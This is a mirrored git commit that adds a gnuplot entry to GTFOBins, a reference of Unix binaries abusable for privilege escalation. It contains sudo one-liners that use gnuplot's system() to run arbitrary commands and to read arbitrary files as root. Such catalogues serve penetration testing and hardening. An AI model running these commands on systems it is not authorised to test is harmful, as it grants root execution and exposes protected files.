mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-09-17 05:39:39 +02:00
Add gnuplot
This commit is contained in:
11
_gtfobins/gnuplot.md
Normal file
11
_gtfobins/gnuplot.md
Normal file
@@ -0,0 +1,11 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
COMMAND=id
|
||||||
|
sudo gnuplot -e 'set print "-" ; print system("'$COMMAND'")'
|
||||||
|
file-read:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo gnuplot -e 'set print "-" ; print system("cat '$LFILE'")'
|
||||||
|
---
|
Reference in New Issue
Block a user